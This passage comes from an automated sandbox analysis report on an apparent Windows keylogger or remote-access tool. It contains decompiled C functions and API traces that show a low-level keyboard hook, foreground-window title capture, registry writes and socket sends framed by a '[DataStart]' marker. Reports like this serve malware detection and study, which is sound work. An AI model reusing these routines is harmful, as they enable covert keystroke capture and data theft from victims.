                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                  • String ID:
                                  • API String ID: 531887698-0
                                  • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
                                  • Opcode Fuzzy Hash: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                  • Instruction Fuzzy Hash: 5B314971A0010DEFCF04DFA4E9999EEBBB9FF88315B10416AE916A3290DB746F04CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B708, Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
				char* _t13;
				long _t15;
				void* _t18;
				int _t19;
				void* _t25;

				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
				if(_t13 != 0) {
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t19 = 0;
					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
					RegCloseKey(_a8);
					if(_t15 == 0) {
						_t19 = 1;
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t19;
				}
			}








                                  0x0040b715
                                  0x0040b71d
                                  0x0040b76a
                                  0x0040b773
                                  0x0040b71f
                                  0x0040b724
                                  0x0040b72e
                                  0x0040b735
                                  0x0040b741
                                  0x0040b74c
                                  0x0040b754
                                  0x0040b756
                                  0x0040b756
                                  0x0040b75b
                                  0x0040b766
                                  0x0040b766

                                  APIs
                                  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                  • RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                  • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                  • String ID:
                                  • API String ID: 2159132150-0
                                  • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                  • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                  • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405532, Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E00405532(void* __ecx) {
				signed int _t8;
				WCHAR* _t9;
				long _t12;
				void* _t21;
				void* _t22;
				void* _t28;

				_t8 =  *0x41b988; // 0x989680
				_t9 = _t8 |  *0x41b98c;
				_t22 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0); // executed
						_t21 = _t9;
						if(_t21 == 0xffffffff) {
							 *((char*)(_t22 + 0x30)) = 0;
						} else {
							_t12 = GetFileSize(_t21, 0);
							_t28 = 0 -  *0x41b98c; // 0x0
							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
								 *((char*)(_t22 + 0x30)) = 1;
								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
									E00405D50(_t22);
								}
								Sleep(0x2710);
							}
							_t9 = FindCloseChangeNotification(_t21); // executed
						}
					} while ( *((char*)(_t22 + 0x30)) == 1);
					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
						return E00405180(_t22);
					}
				}
				return _t9;
			}









                                  0x00405532
                                  0x00405538
                                  0x00405540
                                  0x00405542
                                  0x0040554a
                                  0x0040554d
                                  0x00405562
                                  0x00405569
                                  0x0040556f
                                  0x00405574
                                  0x004055b6
                                  0x00405576
                                  0x00405578
                                  0x00405580
                                  0x00405586
                                  0x00405595
                                  0x00405599
                                  0x0040559d
                                  0x0040559d
                                  0x004055a7
                                  0x004055a7
                                  0x004055ae
                                  0x004055ae
                                  0x004055b9
                                  0x004055c2
                                  0x004055d6
                                  0x00000000
                                  0x004055de
                                  0x004055c2
                                  0x004055e6

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                  • CreateFileW.KERNEL32(00000000), ref: 00405569
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                  • Sleep.KERNEL32(00002710), ref: 004055A7
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 004055AE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@ChangeCloseCreateFindNotificationSizeSleepV01@@
                                  • String ID:
                                  • API String ID: 3579047504-0
                                  • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                  • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                  • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412D56, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				void* _t15;
				int _t17;
				long _t19;
				long _t20;
				long _t22;
				long _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
				_t28 = _t15;
				if(_t28 != 0xffffffff) {
					if(_a16 != 1) {
						L8:
						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
						if(_t17 != 0) {
							_t24 = 1;
						}
						L10:
						FindCloseChangeNotification(_t28); // executed
						_t19 = _t24;
						goto L11;
					}
					_t20 = SetFilePointer(_t28, _t24, _t24, 2); // executed
					if(_t20 == 0xffffffff) {
						goto L10;
					}
					goto L8;
				} else {
					_t19 = 0;
					L11:
					return _t19;
				}
			}













                                  0x00412d5f
                                  0x00412d62
                                  0x00412d64
                                  0x00412d74
                                  0x00412d7b
                                  0x00412d66
                                  0x00412d67
                                  0x00412d6b
                                  0x00412d6c
                                  0x00412d6f
                                  0x00412d6f
                                  0x00412d67
                                  0x00412d93
                                  0x00412d99
                                  0x00412d9e
                                  0x00412da8
                                  0x00412dba
                                  0x00412dc6
                                  0x00412dce
                                  0x00412dd0
                                  0x00412dd0
                                  0x00412dd2
                                  0x00412dd3
                                  0x00412dd9
                                  0x00000000
                                  0x00412dd9
                                  0x00412daf
                                  0x00412db8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412da0
                                  0x00412da0
                                  0x00412ddb
                                  0x00412dde
                                  0x00412dde

                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00412DC6
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 00412DD3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                  • String ID:
                                  • API String ID: 175865374-0
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B522, Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                  • RegQueryValueExA.KERNEL32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                  • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 2462357041-0
                                  • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                  • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004052D5, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004052D5(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				struct HHOOK__* _t11;
				struct HHOOK__** _t14;

				_t14 = __ecx;
				 *0x41b9a8 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					_t11 = SetWindowsHookExA(0xd, E004052BA, 0, 0); // executed
					 *_t14 = _t11;
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}






                                  0x004052dd
                                  0x004052e1
                                  0x004052e9
                                  0x00405300
                                  0x0040530f
                                  0x00405315
                                  0x0040531f
                                  0x00000000
                                  0x0040531f
                                  0x004052eb
                                  0x004052f4
                                  0x004052fa
                                  0x004052fc
                                  0x004052fe
                                  0x00000000
                                  0x00000000
                                  0x004052fe
                                  0x0040532c

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B692, Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B692(void* _a4, void* _a8, char* _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v1028;
				long _t16;
				long _t19;

				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					L3:
					return 0;
				} else {
					_t19 = RegQueryValueExA(_a8, _a12, 0, 0, _a16,  &_a20); // executed
					RegCloseKey(_a8);
					if(_t19 != 0) {
						goto L3;
					} else {
						E00402F9B( &_v1028, _a24, _a28);
						E00403010( &_v1028, _a16, _a20);
						return 1;
					}
				}
			}






                                  0x0040b6ac
                                  0x0040b6b4
                                  0x0040b704
                                  0x0040b707
                                  0x0040b6b6
                                  0x0040b6c8
                                  0x0040b6d3
                                  0x0040b6dc
                                  0x00000000
                                  0x0040b6de
                                  0x0040b6ea
                                  0x0040b6fb
                                  0x0040b703
                                  0x0040b703
                                  0x0040b6dc

                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                  • RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                  • RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction ID: 12c492740cd6cd608dd50e7b32a974a13a24a52f7ce3ce9e30b48251fadff788
                                  • Opcode Fuzzy Hash: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                  • Instruction Fuzzy Hash: CA01FB35100209FFDF119F90EC05FDA3B75FB88758F008025FA14A61A0D775D925EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B4C8, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
				int _v8;
				int _v12;
				int _t14;
				long _t16;
				long _t20;
				signed int _t21;

				_t14 = 4;
				_v8 = _t14;
				_v12 = _t14;
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
					_t21 = RegCloseKey(_a8); // executed
					return _t21 & 0xffffff00 | _t20 == 0x00000000;
				}
			}









                                  0x0040b4cf
                                  0x0040b4d0
                                  0x0040b4d3
                                  0x0040b4e7
                                  0x0040b4ef
                                  0x0040b521
                                  0x0040b4f1
                                  0x0040b505
                                  0x0040b510
                                  0x0040b51d
                                  0x0040b51d

                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                  • RegQueryValueExA.KERNEL32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                  • RegCloseKey.KERNEL32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                  • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                  • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412660, Relevance: 4.5, APIs: 3, Instructions: 18COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00412660(intOrPtr _a4) {
				char _v5;
				short _v520;
				struct HWND__* _t6;

				_t6 = GetForegroundWindow(); // executed
				GetWindowTextW(_t6,  &_v520, 0x200);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v520,  &_v5);
				return _a4;
			}






                                  0x00412669
                                  0x0041267c
                                  0x00412690
                                  0x0041269a

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00412669
                                  • GetWindowTextW.USER32 ref: 0041267C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412690
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@Window$??0?$basic_string@ForegroundG@1@@G@2@@std@@G@std@@TextU?$char_traits@
                                  • String ID:
                                  • API String ID: 3479648101-0
                                  • Opcode ID: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                  • Instruction ID: 64d1ce8039e3a540394b6b1977bfd4dfbb3997696942590b923d2ce918142fcd
                                  • Opcode Fuzzy Hash: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                  • Instruction Fuzzy Hash: 40E0ECB950030FEBDB04EBA0ED4DED9777CAB44309F0081A1B61697191DA74A6498F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004122C4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004122C4(intOrPtr* _a4) {
				struct _MEMORYSTATUSEX _v68;
				intOrPtr* _t8;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				_t8 = _a4;
				 *_t8 = _v68.ullTotalPhys;
				 *((intOrPtr*)(_t8 + 4)) = _v68.ullAvailPhys;
				return _t8;
			}





                                  0x004122cd
                                  0x004122d5
                                  0x004122db
                                  0x004122e1
                                  0x004122e6
                                  0x004122ea

                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 004122D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID: @
                                  • API String ID: 1890195054-2766056989
                                  • Opcode ID: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                  • Instruction ID: 75f814dcae9d38af4eaa51e93271515a162649f50c927f4fe6c9e38d045eb332
                                  • Opcode Fuzzy Hash: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                  • Instruction Fuzzy Hash: E8D067B8901308DFCB04DF94D54999CBBB9BB48344F404058E906A7350DB74E905CA95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B8F8, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                  • String ID:
                                  • API String ID: 4160275866-0
                                  • Opcode ID: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                  • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
                                  • Opcode Fuzzy Hash: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                  • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020C2, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@send
                                  • String ID:
